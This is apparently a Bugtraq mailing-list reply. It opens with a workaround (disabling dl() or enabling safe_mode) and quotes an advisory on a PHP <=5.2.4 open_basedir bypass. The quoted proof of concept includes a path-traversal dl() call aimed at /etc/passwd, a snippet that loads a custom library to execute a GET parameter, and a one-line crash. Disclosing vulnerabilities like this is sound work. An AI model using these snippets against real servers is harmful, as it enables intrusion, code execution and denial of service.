workaround for open_basedir bypass: turn off the dl() function by enable_dl = Off or just enable the safe_mode (which will do it for you) >-----Pôvodná správa----- >Od: [mailto:laurent.gaffie@xxxxxxxxx] >Komu: bugtraq@xxxxxxxxxxxxxxxxx >Predmet: PHP <=5.2.4 open_basedir bypass & code exec & denial of service > > >Application: PHP <=5.2.4 >Web Site: http://php.net >Platform: unix >Bug: open_basedir bypass & code exec & denial of service/*some people call this as a buffer overflow , but it's a denial of service.*/ >special condition: default php-memory-limit >------------------------------------------------------- > >1) Introduction >2) Bug >3) Proof of concept >4) Greets >5) Credits >=========== >1) Introduction >=========== > >"PHP is a widely-used general-purpose scripting language that >is especially suited for Web development and can be embedded into HTML." > >====== >2) Bug >====== > >open_basedir bypass & code exec & denial of service >http://ca.php.net/manual/fr/function.dl.php >===== >3)Proof of concept >===== >/* >debian:~# php -v >PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15) >Copyright (c) 1997-2007 The PHP Group >Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies >*/ > > >Proof of concept example : >/*enable by default in php.ini for php 5.2.x */ > ><?php >dl("../../../../../../../../../../../../../../etc/passwd") >output ---> >Warning: dl() [function.dl]: Unable to load dynamic library './../../../../../../../../../etc/passwd' - ./../../../../../../../../../etc/passwd: invalid ELF header in /usr/local/apache2/htdocs/3.php on line 2 > >ya right ... /etc/passwd dont have any ELF header . >but we agree that it's not checked in anyway by open_basedir. >fine then bypassed . >then : ><?php >dl("./../../../../../../../../../../../home/myuser/www//my_powning_lib/pwned.so"); >$a = powningfunction($_GET['lets_exec_for_fun']); >print_r($a); >?> > >denial of service : >debian:/home/mwoa# php -r'dl(str_repeat("0",27999991));' >Erreur de segmentation >debian:/home/lorenzo# > >======== >4)Greets >======== >Ivanlef0u,Deimos,Benji,Berga,Soh,and everyones from worldnet: #futurezone & #nibbles > >===== >5)Credits >===== > >laurent gaffii >laurent.gaffii@xxxxxxxxx >secorizon coming soon !
